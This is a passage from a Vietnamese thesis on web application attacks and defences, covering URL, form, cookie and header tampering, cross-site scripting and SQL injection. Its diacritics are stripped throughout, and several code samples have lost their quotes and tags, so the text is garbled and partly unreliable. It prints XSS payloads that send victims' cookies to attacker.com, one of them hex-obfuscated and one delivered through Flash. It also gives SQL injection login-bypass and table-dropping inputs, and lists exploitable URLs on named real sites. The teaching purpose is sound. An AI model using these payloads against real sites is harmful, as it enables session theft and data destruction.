S dng nhng k t c bit ( ni r hn trong phn ph lc) hacker c th chn
thm vo d liu gi nhng k t trong chui cu lnh nh trong kthut
XSS, -- trong SQL. thc thi cu lnh.
III.5. Vt qua ng dn (Path Traversal):
L phng php li dng ng dn truy xut mt tp tin trn URL tr kt qu
v cho trnh duyt m hacker c th ly c ni dung tp tin bt k trn h thng.
III.6. Chn m lnh thc thi trn trnh duyt nn nhn
(Cross- Site Scripting):y l k thut tn cng ch yu nhm vo thng tin trn my tnh ca ngi
dng hn l vo h thng my ch. Bng cch thm mt on m bt k ( thng
c lp trnh bng ngn ng kch bn nh JavaScript, VBScript), hacker c
th thc hin vic nh cp thng tin quan trng nh cookie t tr thnh
ngi dng hp l ca ng dngda trn nhng thng tin nh cp ny. Cross-
Site scripting cng l mt kiu tn cng session hijacking.
III.7. Thm cu lnh h thng (OS Command Injection):
Kh nng thc thi c nhng cu lnh h thng hay nhng on m c thm
vo trong nhng tham s m khng c s kim tra cht ch nh tham s ca
form, cookies, yu cu HTTP Header, v nhng d liu nguy him trong nhng
tp tin c a ln trnh ch.
Thnh cng trong kthut ny gip hacker c th thc thi c nhng cu lnh h
thng vi cng quyn ca trnh ch.
8/14/2019 LVCNTT-BaoMatWeb
33/169
Khoa CNTT
Chng 3: Gii thiu slc vcc kthut tn cng
-Trang 30-
III.8. Chn cu truy vn SQL (SQL Injection)
Trong lp trnh vi csd liu, ngi lp trnh sai st trong vn kim tra
gi tr nhp vo t hacker li dng thm vo nhng cu truy vn hay nhnggi tr khng hp l d dng ng nhp vo h thng.
III.9. Ngn ngpha my ch (Server side includes)
L kh nng thm vo nhng cu lnh thuc h thng nh nhng file (include
file), truy xut csd liu (jdbc)khin cho hacker c chi truy xut n file,
csd lium bnh thng khng th xem c trn Web site.
III.10. K trng (Null Characters)
Li dng chui k t thng kt thc bng \0 m hacker thng thm vo nh
la ng dng v vi nhng ng dng s dng chng trnh cgi nh C++ th C++
cho rng \0 l du kt thc chui.
V d:
Hacker thm chui sau:
nhp: ti th nht\0 alert(document.cookie)
nu ng dng s dng chng trnh C++ kim tra tnh ng n ca chui th
chui trn hp l do C++ s nhn bit \0 l kt thc chui nn khng kim tra
on sau..
III.11. Thao tc trn tham s truyn (Parameter
manipulation)Nhng thng tin trao i gia trnh ch v trnh duyt c lu tr trong nhng
bin nh bin trn URL, bin n form, cookieBi v vic kim sot bin cha
8/14/2019 LVCNTT-BaoMatWeb
34/169
Khoa CNTT
Chng 3: Gii thiu slc vcc kthut tn cng
-Trang 31-
c quan tm ng mc nn hacker c th li dng sa i gi tr bin nh
cp phin lm vic ca ngi dng hay thay i gi tr mt mn hng.
IV. L THNG TIN (informational)
Nhng tp tin v ng dng trn h thng cha nhng thng tin quan trng nh m
ngun mt trang Web hay tp tin cha mt khu ca ngi dng trn h thng lun l
mc tiu ca hacker. Ngoi ra nhng li ch thch trong m ngun cng l ngun
thng tin hu ch cho hacker.
Hacker s dng tr li HTTP t h thng xc nh mt tp tin hay ng dng ctn ti hay khng.
V d 1.IV-1:
HTTP 200 : tp tin tn ti
HTTP 404: tp tin khng tn ti.
V.TCHI DCH V (Denial of service (DoS)
Mt khi lng ln yu cu c gi cho ng dng trong mt khong thi gian nht
nh khin h thng khng p ng kp yu cu dn n h thng b ph v.
V khun kh v thi gian ca lun vn l c hn nn lun vn ch thc hin tm hiu
mt s kthut ph bin v kh nng ph hoi mt h thng mng vi mc cao. V
trong cc chng phn th hai, lun vn s trnh by khn tng kthut sau :
Thao tc trn tham s truyn
Chn m lnh thc thi trn trnh duyt
Chn cu truy vn SQL
Chim hu phin lm vic
8/14/2019 LVCNTT-BaoMatWeb
35/169
Khoa CNTT
Chng 3: Gii thiu slc vcc kthut tn cng
-Trang 32-
Trn b m
T chi dch v
Mt vi kthut khc
o K t rng
o M ha URL
o Li dng truy xut ng dn n mt tp tin
o Ngn ngpha trnh ch
8/14/2019 LVCNTT-BaoMatWeb
36/169
Khoa CNTT
Phn II: Cc kthut tn cng v bo mtng dng Web
-Trang 33-
PHN THHAI
CC K THUT TN CNG VBO MT NG DNG WEB
8/14/2019 LVCNTT-BaoMatWeb
37/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 34-
Chng 4
THAO TC TRN THAM S TRUYN
Ni dung:I. Thao tc trn URL
II. Thao tc trong bin n form
III. Thao tc trn cookie
IV. Thao tc trong HTTP Header
8/14/2019 LVCNTT-BaoMatWeb
38/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 35-
CHNG 4:THAO TC TRN THAM S TRUYN
Thao tc trn tham s truyn l kthut thay i thng tin quan trng trn cookie, URL
hay bin n ca form. Kthut Cross-Site Scripting, SessionID, SQL Injection, Buffer
Overflowcng cn dng n cc tham s ny hon thin cc bc tn cng ca
hacker. C th ni cc tham s truyn l u mi cho mi hot ng ca hacker trong
qu trnh tn cng ng dng. V thy l ni dung chng u tin c cp trong
phn th hai, mc ch cng l h trtt hn phn trnh by cc chng k tip.
I. THAO TC TRN URL
I.1. Khi nim:
Khi nhp mt form HTML th kt qu sc gi i theo hai cch: GET hay
POST. Nu dng GET, th tt c cc tn bin v gi tr ca n s xut hin trong
chui URL.
V d 4.I.1-1: C mt trang web ng dng cho php thnh vin c thay i
mt khu.
http://www.nganhang.com/example?user=thang&newpass=123
Vi:
+ username l tn ngi cn thay i mt khu.
+ newpass l mt khu mi cho username
Tuy nhin, bng cch thay i tham s nh sau:
8/14/2019 LVCNTT-BaoMatWeb
39/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 36-
http://www.nganhang.com/example?user=admin&newpass=111111
Hacker c th thay i mt khu ca admin bng mt mt khu mi bt k,
trong v d ny l 1111111
I.2. Mt s bin php khc phc
chng li kiu thay i ni dung mt chui URL, ng dng c th p dng
bin php sau:
ng dng s dng cch bng bm (hash table). Sau khi ngi dng chng
thc thnh cng vi mt username , ng dng s sinh ra mt kho tng ng.
Kho ny s c lu trn server cng vi bin username trong i tng
bng bm. Mi khi ngi dng kt ni n ng dng, kho v username ny
sc gi i v c so snh vi kho v username trong bng bm. Nu
tng ng vi bn ghi trong d liu th hp l. Cn nu khng th server bit
rng ngi dng thay i URL.
Ngoi ra, vi nhng thng tin c gi tr, cn m ho thng tin ny trc khi
cho hin th trn trnh duyt trnh hacker c th sa i ty .
II. THAO TC TRN BIN N FORM
II.1. Khi nim
Thng tin c thc chuyn i thng qua mt bin n ca form, gi l Hidden
Form Field. Bin n form khng hin th trn mn hnh trnh duyt nhng ngi
dng c th tm thy ni dung ca n trong view source , v thy l mt
im yu hacker li dng bng cch lu ni dung trang web xung trnh duyt,
thay i ni dung trang v gi n trnh ch.
8/14/2019 LVCNTT-BaoMatWeb
40/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 37-
V d 4.II.1-1: Form gc c ni dung nh sau:
...
...
Nu khng c s thay i no th yu cu n trnh ch c ni dung :
POST /cuahang.pl HTTP/1.0
...
giaca=99.99
Nhng nu hacker gn mt gi tr khc cho trng giaca :
...
...
th yu cu s thay i:
POST /cuahang.pl HTTP/1.0
...
giaca=0.99
Ngoi vic thay i ni dung bin n ca form, hacker cn bin i ni dung cc
thnh phn trong form, nh chiu di ca mt nhp d liu thc hin vic tn
cng BUFFER OVERFLOW,
8/14/2019 LVCNTT-BaoMatWeb
41/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 38-
II.2. Mt s bin php khc phc
Ch nn s dng bin n ca form hin th d liu trn trnh duyt, khng
c s dng gi tr ca bin thao tc trong x l ng dng.
Dng bin HTTP_REFERER kim tra ngun gc ca yu cu gi n, tuy
nhin hacker c th s dng Proxy che du ngun gc thc ca n, v vy
cng khng nn qu tin tng bin HTTP_REFERER kim tra.
Ghp tn v gi tr ca bin n thnh mt chui n. S dng thut ton m
ho MD5 hoc mt kiu hash mt chiu khc tng hp chui v lu nvo mt hidden field gi l Chui mu.
Khi gi tr trong form c gi i, cc thao tc nh trn c thc hin li vi
cng mt kho m ta nh trc. Sau em so snh vi Chui mu, nu
chng khng khp nhau th chng t gi tr trong biu mu b thay i.
Dng mt sessionID tham chiu n thng tin c lu tr trn csd
liu.
8/14/2019 LVCNTT-BaoMatWeb
42/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 39-
III. THAO TC TRN COOKIE
III.1. Khi nim
phn th nht, chng 2, mc IV, lun vn trnh by cbn khi nim v
cookie. Trong mc ny, lun vn ch trnh by cch thay i mt cookie.
V cookie l thnh phn lu tr thng tin bo mt nht nn Cookie thng c
dng lu gi trng thi cho giao thc HTTP hn l bin n form v bin URL.
N cn c dng lu tr nhng thng tin ca ngi dng khi s dng ng
dng v nhng d liu khc ca session. Tt c cc loi cookie nh persistent haynon-persistent, secure hay insecure u c th b thay i bi ngi dng v c
gi v cho trnh ch. Do hacker c th thay i ni dung cookie ph hoi
ng dng.
Vi nhng cng c min ph nh Winhex th non-persistent cookie c th b thay
i ni dung. Cn SSL ch c th bo v cookie trong qu trnh truyn.
V d 4.III.1-1: v cookie dng lu tr thng tin cho ng dng web thng tin
du lch:
Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
Cookie xc nh ngi dng ny khng phi l Admin (ADMIN=no), nhng nu
hacker thay i trng ny iu g s xy ra? Hacker c th thay i li thnh nh
sau:Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
Hacker lc ny mang vai tr l mt ngi qun tr ca ng dng.
8/14/2019 LVCNTT-BaoMatWeb
43/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 40-
III.2. Mt s bin php khc phc
S dng i tng session lu tr thng tin quan trng trn trnh ch. Khi ng
dng cn kim tra thng tin ca mt ngi dng, ng dng s dng sessionIDca ngi dng chn thng tin ca ngi dng trong cache hay cs
d liu.
Xy dng mt c ch kim tra ni dung ca cookie tm ra nhng gi tr
khng hp l t bit c cookie l gi. V d l nu bin cngi
qun tr c c thit lp l ng trong cookie, nhng gi tr ca s th t
ngi dng trong cookie li khng ging nh gi tr s th t ca ngi quntr c lu tr trn server.
Phng php cui cng l m ho cookie. C mt s phng php m ho
nh symmetric (dng 1 kha duy nht cho c m ha v gii m) hay
asymmetric (m ha dng 2 kha ring bit, mt kha dng chung cho m ha
v mt kha ring gii m)
IV. THAO TC TRONG HTTP HEADER
URL, bin n form, cookie u l nhng thnh phn lu tr thng tin m ngi dng
thng thng c th xem v thay i. Tuy nhin, nhng thnh phn u c
chuyn i thng qua HTTP Header. V th, mc d HTTP Header khng phi l tham
s truyn ca mt ng dng nhng mi thng tin u c lu tr vo n trc khi
chuyn i nn trong phn ny s cp n vic thay i mt HTTP Header.
IV.1. Khi nim
Thng thng ch c trnh duyt v trnh ch l trao i HTTP Header ( xem chi
tit trong phn th nht, chng 2, mc II), cn hu ht cc ng dng web th
8/14/2019 LVCNTT-BaoMatWeb
44/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 41-
khng. Tuy nhin, hacker c th t vit mt chng trnh iu khin HTTP
header (nh xem ni dung, to mi) hay s dng cc proxy min ph cho php
thay i d liu c gi t trnh duyt. Ngoi ra hacker c th tn cng trc tip
bng cch telnet gi HTTP Request n trnh ch.
V d 4.IV.1-1:
su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0Referer: www.redhat.com/login.asp
User-Agent:
HTTP/1.1 200 OK
Date: Mon, 17 Dec 2001 20:39:02 GMT
Server:
Connection: close
Content-Type: text/html
Phn in m l ni dung hacker thay i.
V d 4.IV.1-2:
Referer header cha URL ca trang web m t yu cu c gi i. V th
mt vi ng dng s kim tra thnh phn ny trong headerm bo rng n
c gi t trang web ca ng dng . Vic lm ny dng ngn chn vic
hacker lu li trang web xung my, chnh sa thuc tnh form, ph hoi bngcch nhm vo client side validate hay server side include, sau gi i. Nhng
phng php kim tra ny s tht bi khi hacker c th sa li Referer header
n ging nhc gi t trang web hp l.
8/14/2019 LVCNTT-BaoMatWeb
45/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 42-
Referer: www.redhat.com/login.asp
IV.2. Mt s bin php khc phc
n gin l khng tin tng vo HTTP header nu cha c cc bin php an ton.
Vi cc header gi t trnh ch, chng hn nh cookie th c thc m ho.
Cn vi cc header gi t trnh khch th khng nn dng cc tham s nh
referer, thc hin cc bin php an ton.
Nhn xt:
Mi thng tin quan trng trao i gia trnh duyt v trnh ch khng nn lu tr
di dng chui thng thng m cn c m ha, ngoi ra nhng thng tin ny
nn c kim tra, i chiu vi d liu trong csd liu hay trong cache ca trnh
ch, phng trnh trng hp ni dung thng tin b sai lch.
Bn cnh , vic kim tra d liu ng n l cn thit v hu nh cc k thut tn
cng u da vo d liu nhp trn URL, bin n form hay cookie nh kiu tn cng
Cross-Site Scripting trong chng k tip hay SQL Injection trong chng 6
8/14/2019 LVCNTT-BaoMatWeb
46/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 43-
Chng 5
CHN M LNH THC THI TRN
TRNH DUYT NN NHNNi dung:
I. Cross Site Scripting (XSS)
II. Phng php tn cng XSS truyn thng.
III. Mt s WebSite tm thy l hng XSS.
IV. Tn cng XSS bng Flash.
V. Cch phng chng.
8/14/2019 LVCNTT-BaoMatWeb
47/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 44-
CHNG 5:
CHN M LNH THC THI TRN TRNH DUYT
NN NHN (CROSS SITE SCRIPTING)
I. K THUT TN CNG CROSS SITE SCRIPTING (XSS)
Phng php Cross Site Scripting (c vit tt l XSS) l phng php tn cng
bng cch chn thm nhng on m c kh nng nh cp hay thit lp c nhngthng tin quan trng nh cookies, mt khu, vo m ngun ng dng web t
chng c chy nh l mt phn ca ng dng Web v c chc nng cung cp hoc
thc hin nhng nhng iu hacker mun.
Phng php ny khng nhm vo my ch h thng m ch yu tn cng trn chnh
my ngi s dng. Hacker s li dng s kim tra lng lo tng dng v hiu bit
hn ch ca ngi dng cng nh bit nh vo s t m ca h dn n ngi dngb mt thng tin mt cch d dng.
Thng thng hacker li dng a ch URL a ra nhng lin kt l tc nhn kch
hot nhng on chng trnh c vit bng ngn ng my khch nh VBScript,
JavaScriptc thc thi trn chnh trnh duyt ca nn nhn.
V D 5.I-1:http://hotwired.lycos.com/webmonkey/00/index1.html?tw=alert
(document.cookie);
8/14/2019 LVCNTT-BaoMatWeb
48/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 45-
hay:
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_te
xt=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Phn in m l on m c thm vo vi mc ch nh cp cookies ca nn nhn.
Trong nhng v d 2.I-1 trn, hu ht nhng tin t URL l a ch ca nhng ng
dng Web c tht (VD: http://www.microsoft.com/education,
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/...) li dng cch truyn tham s
trn URL m hacker c th d dng thm vo on m nh cp cookie.
V d 5.I-1 trn ch minh ha mt cch n gin l thm on m ca mnh vo trang
Web thng qua URL. Nhng thc s th c rt nhiu cch thm on m
JavaScript vi mc ch tn cng kiu XSS. Hacker c th d dng li dng
Document Object Model (DOM) thay i ng cnh v ni dng Web ng dng.
Sau y l danh sch ni c th chn on m:
V d 5.I-2:
&[code]
&{[code]};
8/14/2019 LVCNTT-BaoMatWeb
49/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 46-
[code]
[code]
[code];
(ti liu t http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0)
Phn in m l phn c tht on m nh cp thng tin.
II. PHNG PHP TN CNG XSS TRUYN THNGng dng Web thng lu tr thng tin quan trng cookie. Cookie l mu thng
tin m ng dng lu trn a cng ca ngi s dng. Nhng chng dng thit lp
ra cookie th mi c thc n. Do ch khi ngi dng ang trong phin lm vic
ca ng dng th hacker mi c c hi nh c p cookie. Cng vic u tin ca
hacker l tm trang ch d ngi dng ng nhp sau khi tm ra l hng trn
ng dng .
Cc bc thc hin XSS truyn thng:
8/14/2019 LVCNTT-BaoMatWeb
50/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 47-
Hnh 5.II-1. Qu trnh thc hin XSS
Tm tt cc bc thc hin:
Bc 1: Hacker bit c ngi dng ang s dng mt ng dng Web c l
hng XSS.
Bc 2: Ngi dng nhn c 1 lin kt thng qua email hay trn chnh trang
Web (nh trn guestbook, banner d dng thm 1 lin kt do chnh hacker to
ra). Thng thng hacker khin ngi dng ch bng nhng cu kch thch
s t m ca ngi dng nh Kim tra ti khon, Mt phn thng hp dn
ang chbn
Bc 3: Chuyn ni dung thng tin (cookie, tn, mt khu) v my ch ca
hacker.
Bc 4: Hacker to mt chng trnh cgi ( v d 3 ny l steal.cgi) hoc mt
trang Web ghi nhn nhng thng tin nh cp vo 1 tp tin
Bc 5: Sau khi nhn c thng tin cn thit, hacker c th s dng thm
nhp vo ti khon ca ngi dng.
8/14/2019 LVCNTT-BaoMatWeb
51/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 48-
V d 5.II-1: khai thc l hng trn ng dng hotwired.lycos.com, hacker c th
thc hin nh sau :
Look at this!
Mt phn thng hp dn ang chbn
Sau khi ngi dng nhp vo lin kt Mt phn thng hp dn ang chbn,
cookie trn my nn nhn s bnh cp v l tham s truyn vo cho chng trnh
steal.cgi ca hacker.
http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C
20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286
Vn t ra l c th ngi lp trnh s bo vng dng Web ca mnh bng cch
lc nhng k tc bit nh , hay + (c th trnh trng hp dng du thc hin
cu truy vn SQL chng hn) Nhng hacker c th li dng m hex thay cho
nhng k t c bit tn cng.
Thay th bng nhng s hex cho nhng k t ASCII.
V d 5.II-2:
8/14/2019 LVCNTT-BaoMatWeb
52/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 49-
http://www.attacker.com/steal.cgi:
h -> 0x0068
t -> 0x0074
t -> 0x0074
p -> 0x0070
: -> 0x003A
/ -> 0x002F
Sau y l v d trong cch dng m hex trong ng dng web.
V d 5.II-3:
Look at this!
8/14/2019 LVCNTT-BaoMatWeb
53/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 50-
u %2B= String.fromCharCode(0x0063);u %2B=
String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x0065);u %2B=
String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x002E);u %2B=
String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x006C);
u %2B= String.fromCharCode(0x002E);u %2B=
String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x003F);
u %2B=document.cookie;document.location.replace(u);"
onMouseOver="window.status=http://www.hotwired.lycos.com/index2.ht
ml';return true"
onMouseOut="window.status='';return true">Mt phn thng hp dn ang ch
bn
III.MT S WEBSITE TM THY L HNG XSS
Tn cng ty Domain Nhng lin kt b khai thc
NBC http://www.shop http://www.shopnbc.com/listing.asp?qu=
8/14/2019 LVCNTT-BaoMatWeb
54/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 51-
nbc.com alert(document.cookie)&frompa
ge=4
&page=1&ct=VVTV&mh=0&sh=0&RN=1
Microsoft http://www.micr
osoft.com/
http://www.microsoft.com/education/?ID=MCTN
&target=http://www.microsoft.com/education/?ID=
MCTN
&target=alert(document.cookie)
Chase https://www.cha
se.com/
https://www.chase.com/chase/gx.cgi/FTcs?pagenam
e=alert(document.cookie)
&urlname=smallbusiness/direct
EBay https://scgi.ebay.
co.uk/
https://scgi.ebay.co.uk/saw-
cgi/eBayISAPI.dll?SSLRegisterShow
&countryid=3&siteId=3&co_partnerId=0&UsingSS
L=1
&aolemail=alert(document.cookie)
Oracle Japan http://www.oracle.co.jp/
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?
search_text=alert(document.cookie)
IV. TN CNG XSS BNG FLASH
Ngoi nhng cch a mt on m nguy him th hacker cn c th li dng nhngtp tin flash nh cp thng tin.
8/14/2019 LVCNTT-BaoMatWeb
55/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 52-
Macromedia Flash cho php lp trnh bng mt ngn ng kch bn c xy dng
sn trong Flash l ActionScript. ActionScript c c php n gin v tng t nh
JavaScript, C hay PERL. V d hm getURL() dng gi mt trang web khc, tham
s thng l mt URL chng hn nh http://www.yahoo.com.
V d 5.IV-1:
getURL(http://www.yahoo.com)
Tuy nhin c th thay th URL bng JavaScript:
getURL(javascript:alert(document.cookie))
V d 5.IV-1 trn s lm xut hin bng thng bo cha cookie ca trang web cha
tp tin flash . Nh vy l trang web b tn cng, bng cch chn mt on
JavaScript vo ng dng Web thng qua tp tin flash. Mt v d khc r hn v cch
tn cng ny l:
y l on lnh trong tp tin flash v s c thi hnh khi tp tin flash c c:
getURL(javascript:location(http://www.attacker.com?newcookie=+do
cument.cookie))
Nh vy l khi ngi dng xem trang web cha tp tin flash ny th ngay lp tc
cookie ca h do trang web cha tp tin flash to ra s gi v cho hacker.
8/14/2019 LVCNTT-BaoMatWeb
56/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 53-
Hnh 5.IV-2: Cch vit Action Scipt trong Flash
V d 5.IV-2:
DeviantArt l mt trang web ni ting, cho php thnh vin ca n gi cc tp tin
flash ln cho mi thnh vin cng xem. V th hacker c thn cp cookie ca cc
thnh vin v cng c th l ti khon ca ngi qun tr web, bng cch ng k lm
thnh vin ca ng dng Web ny, gi tp tin flash ln my ch v i cc nn nhn
xem tp tin flash . Di y l a ch lin kt dn mt tp tin flash nh trnh
by trong v d 5.IV-2:
http://www.deviantart.com/deviation/1386080
Ngoi ra cc trang web cho php thnh vin gi d liu dng HTML nh din n,
cc chc nng to ch k ring, cng c th l mc tiu ca cch tn cng ny,
bng cch nhp on m gi tp tin flash vo.
8/14/2019 LVCNTT-BaoMatWeb
57/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 54-
HEIGHT="48"
id="1"
ALIGN="">
V. CCH PHNG CHNG
Vi nhng d liu, thng tin nhp ca ngi dng, ngi thit k ng dng Web
cn phi thc hin vi bc cbn sau:
o To ra danh sch nhng th HTML c php s dng.
o Xa b th
o Lc ra bt k mt on m JavaScript/Java/VBScript/ActiveX/Flash Related
no.
o Lc du nhy n hay kpo Lc k t Null ( v kh nng thm mt on m bt k sau k t Null khin cho
ng dng d lc b th vn khng nhn ra do ng dng nghrng
chui kt thc t k t Null ny).
8/14/2019 LVCNTT-BaoMatWeb
58/169
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
-Trang 55-
o Xa nhng k t > , <
o Vn cho php nhp nhng k tc bit nhng sc m ha theo chun
ring.
i vi ngi dng, cn cu hnh li trnh duyt nhc nhngi dng c cho
thc thi ngn ng kch bn trn my ca h hay khng? Ty vo mc tin cy
m ngi dng s quyt nh.
Nhn xt:
Kthut XSS kh phbin v d dng p dng, tuy nhin mc thit hi ch dng
li mc tn cng trn my nn nhn thng qua nhng lin kt hay form la om hackera n cho nn nhn. V th, ngoi vic ng dng kim tra tnh ng n
ca d liu trc khi s dng th vic cn nht l ngi dng nn cnh gic trc khi
bc vo mt trang Web mi. C th ni, nhvo s cnh gic ca ngi dng th
90% t c s bo mt trong k thut ny. Tuy nhin, trong chng 6, s tn
cng li nhm vo my ch, nhm thu thp thng tin trong c s d liu v t
ginh quyn qun tr ng dng.
8/14/2019 LVCNTT-BaoMatWeb
59/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 56-
Chng 6
CHN CU TRUY VN SQL
Ni dung:I. Khi nim SQL Injection
II. Gii thiu m hnh csd liu.
III. Cc cch tn cng.
IV. Cch phng chng .
8/14/2019 LVCNTT-BaoMatWeb
60/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 57-
CHNG 6:
CHN CU TRUY VN SQL (SQL INJECTION)
I. KHI NIM SQL INJECTION
SQL Injection l cch li dng nhng l hng trong qu trnh lp trnh Web v phn
truy xut csd liu. y khng ch l khuyt im ca ring SQL Server m n
cn l vn chung cho ton b cc csd liu khc nh Oracle, MS Access hay
IBM DB2.
Khi hacker gi nhng d liu (thng qua cc form), ng dng Web s thc hin v
tr v cho trnh duyt kt qu cu truy vn hay nhng thng bo li c lin quan n
c sd liu. V nhnhng thng tin ny m hacker bit c ni dung csd
liu v t c thiu khin ton b h thng ng dng.
II. GII THIU M HNH CSDLIU trnh by tt hn ni dung kthut ny, lun vn s dng bng User minh ha
kthut tn cng.
Bng User:
STT Tn trng Ci t vt
l
Kiu
trng
Kch
thc
Din gii
1 tkUsername Kha chnh Text 50 i ngi dng c 1
account ng nhp.
2 tkPassword Text 50 assword ng
hp
8/14/2019 LVCNTT-BaoMatWeb
61/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 58-
Quy c:
Ngn ng lp trnh s dng minh ha trong chng ny l ASP vi csd liu
l SQL Server.
III. CC CCH TN CNG
III.1. Kthut tn cng SQL Injection
Di y l k thut SQL injection n gin nht, dng vt qua cc form
ng nhp.
V d 6.III.1-1: gi sng dng web c on m sau:
SQLQuery= SELECT tkUsername FROM User WHERE tkUsername= &
strUsername & AND Password= & tkPassword &
flag= GetQueryResult (SQLQuery)
if flag = then
check=FALSE
else
check=TRUE
end if
on m trn kim tra chui nhp Username v Password. Nu tn ti trong bng
User th check=true ngc li check=false.
Gi tri nhp vo l:Username: OR =
Password: OR =
8/14/2019 LVCNTT-BaoMatWeb
62/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 59-
Cu lnh SQL lc ny nh sau:
SELECT tkUsername FROM User WHERE tkUsername= OR = AND
Password= OR =
Cu lnh so snh trn lun lun ng (v lun bng ). Do cu iu kin
trong mnh WHERE lun ng. Gi tr tn ngi s dng ca dng u tin
trong bng sc chn.
Kt hp vi k tc bit ca SQL :
k t ; : nh du kt thc 1 cu truy vn
k t -- : n chui k t pha sau n trn cng 1 dng
V d 6.III.1-2:
Username: ; drop table User--
Password:
Cu lnh SQL lc ny nh sau:
SELECT tkUsername FROM User WHERE tkUsername= ;drop table
User-- AND Password= & tkPassword &
Vi cu lnh trn th bng User s b xa hon ton.
V d 6.III.1-3: Mt v d khc s dng k tc bit SQL thm nhp vo h
thng nh sau:Username: admin--
Password:
8/14/2019 LVCNTT-BaoMatWeb
63/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 60-
Cu lnh SQL nh sau:
SELECT tkUsername FROM User WHERE tkUsername= admin-- AND
Password= & tkPassword &
Cu lnh trn cho php ng nhp vo h thng vi quyn admin m khng i
hi password.
III.2. Tn cng da vo cu lnh SELECT
Ngoi k thut n gin trn, vic tn cng thng da trn nhng thng bo li
ly thng tin v bng cng nh nhng trng trong bng. lm c iu
ny, cn phi hiu nhng thng bo li v t chnh sa ni dung nhp cho ph
hp.
Khi nim Direct Injection:
Nhng i sc thm vo trong cu lnh m khng nm gia nhng du nhy
n hay du ngoc kp l trng hp direct injection. V d III.2.1
V d 6.III.2-1:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername=& tName
Khi nim Quote Injection:
Nhng trng hp i sc nhp vo u c ng dng cho vo gia hai du
nhy n hay ngoc kp l trng hp Quote Injection. V d III.2.2
V d 6.III.2-2:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername=& tName &
8/14/2019 LVCNTT-BaoMatWeb
64/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 61-
v hiu ho du nhy v thay i cu lnh m vn gic c php ng,
chui m chn thm vo phi c mt du nhy n trc chui k tc chn
vo v cui cu lnh phi c mt du nhy n, chng hn nh sau:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername= and
=
Nu thc hin nh trn m thng bo li c lin quan n du ( th trong
chui chn vo phi c ):
V d 6.III.2-3: Gi s:
StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=& tName
& )
Th c php hp l nh sau:
StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=)or
=
Ngoi ra k t % thng c dng trong nhng trng hp tm kim thng
tin.
V d 6.III.2-4:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % &
tName &
8/14/2019 LVCNTT-BaoMatWeb
65/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 62-
III.3. Tn cng da vo cu lnh HAVING
HAVING s dng cng chung vi mnh GROUP BY l phng php hu
hiu nhn thng tin bng, trng v sc bn su hn trong phn 4.
III.4. Tn cng da vo cu lnh kt hp UNION
